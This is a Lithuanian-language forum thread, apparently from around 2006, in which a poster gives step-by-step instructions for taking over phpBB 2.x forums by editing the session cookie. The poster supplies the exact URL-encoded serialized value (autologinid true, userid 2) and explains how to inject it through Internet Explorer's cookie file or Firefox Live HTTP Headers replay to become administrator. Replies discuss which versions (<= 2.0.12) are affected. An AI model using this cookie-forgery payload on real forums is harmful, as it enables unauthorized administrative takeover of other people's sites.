Straipsniai.lt

na va dabar as jums parasisiu kaip galima perimti musu mylimus forumus ant phpBB.

Aprasisiu kaip dariti tai su firefoxu ir musu "mylimu" Internet Explorer.

Internet Explorer

Irasinejame adresa musu taikinio, mes turime ijunkti cookies, ir rejestrojames.
Turime ijungti opcia zinok slaptazoti, ar pan...

Paskuj einame i kataloga kur yra cookies C:\Documents and Settings\[$useriovardas]\Cookies
Ieskome sausainio is musu forumo buna kaskas panasaus:
Szukamy w nim ciasteczka z naszego forum, przeważnie:
[userionaimas]@[Forumonaimas],atidarome tai su notepad jis turi prasideti taip:phpbb2mysql_data[ir cia numeriukai]
Tuose "makonose" randame kaska tokio
:
a%3A0%3A%7B%7D ir tai mes pervardiname :

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22useri d%22%3Bs%3A1%3A%222%22%3B%7D

Irasome cookies, ant ie dodame funkcja reload ir mes jau adminai

Mozzila Firefox

Su firefox bus lengviau.

Downloadiname labai idomu plugina http://livehttpheaders.mozdev.org/
instalojam ir restartuojam ff.

jungiames su forumu, nereika rejestruotis ,
Einame Tools => Live HTTP Headers
ir laukiame kol saitas uzsiloadins,paskuj aukiame kada mums pasirodis kaskas tuokio:

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,t ext/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

Paskuj clickiname Replay ir

Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Pervardink tai situo Dar karta replay ir viskas mes adminai
zinau sis postas nera geriausias bet neks nepradeda hackoti teo (telekomo) serveriu
Big thx 4 securityfocus.net

nezinau kodel bet man gavos 3 temos

Galejai geriau antroje hack temoje parasyti.Ten kskp seniai sujudimas kox buvo

Good for noobs geriau butum parases koky 2.0.20 hacked o ne caro ruriko laiku foruma hacking

Tut buvo visai idomus, tik bandydamas susiduriau su keliais nenumatytais atvejais, nuejus i foruma, ir paleidus tools Live Http headers, kraunasi tiek kad man nusibosta laukti, del kokiu priezasciu tai gali ivykti? Paziurejau google headerius ir aptikau idomu dalyka, kad

HTTP/1.x 200 OK
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Tue, 30 May 2006 13:15:14 GMT
X-Cache: MISS from proxy.ISP.lt
X-Cache-Lookup: MISS from proxy.ISP.lt:3128
Connection: close

GET /complete/search?hl=en HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/webhp?complete=1&hl=en
Cookie: PREF=ID=bf8d736975537bfc:TM=1148992462:LM=1148992462:S=VIxFFaxpB4ozC8Vv

HTTP/1.x 200 OK
Content-Type: text/html; charset=utf-8
Server: Auto-Completion Server
Cache-Control: private, x-gzip-ok=""
Date: Tue, 30 May 2006 13:15:15 GMT
X-Cache: MISS from proxy.ISP.lt
X-Cache-Lookup: MISS from proxy.ISP.lt:3128
Connection: close

Nejau mano ISP prikiso prie to nagus? Ir ka reiskia tas zodis "rejestrojames"

rejestruojames t.y. REJESTRUOJAMES
O kai nueini i foruma tai ijungi livehttphdrs ir duodi reload

Taip: senas geras exploitas is senu geru laiku. Labai paprastas ir dar labiau efektyvus. Dabar tai sunkiausia dalis darant kas cia parasyta tai rast pakankamai sena phpbb versija, kad viskas suveiktu.

Jai exploitas tinka 2.0.12 versijai ar jis tiks ankstesnems? pvz 2.0.10 ir pan.

Prie exploito daznai rasoma <= 2.0.12.
<= zenklas programavimo kalbose reiskia "maziau arba lygu".
O jei tik rasoma 2.0.12 be <= tai matyt tik = arba < nieks nebande.

A, supratau.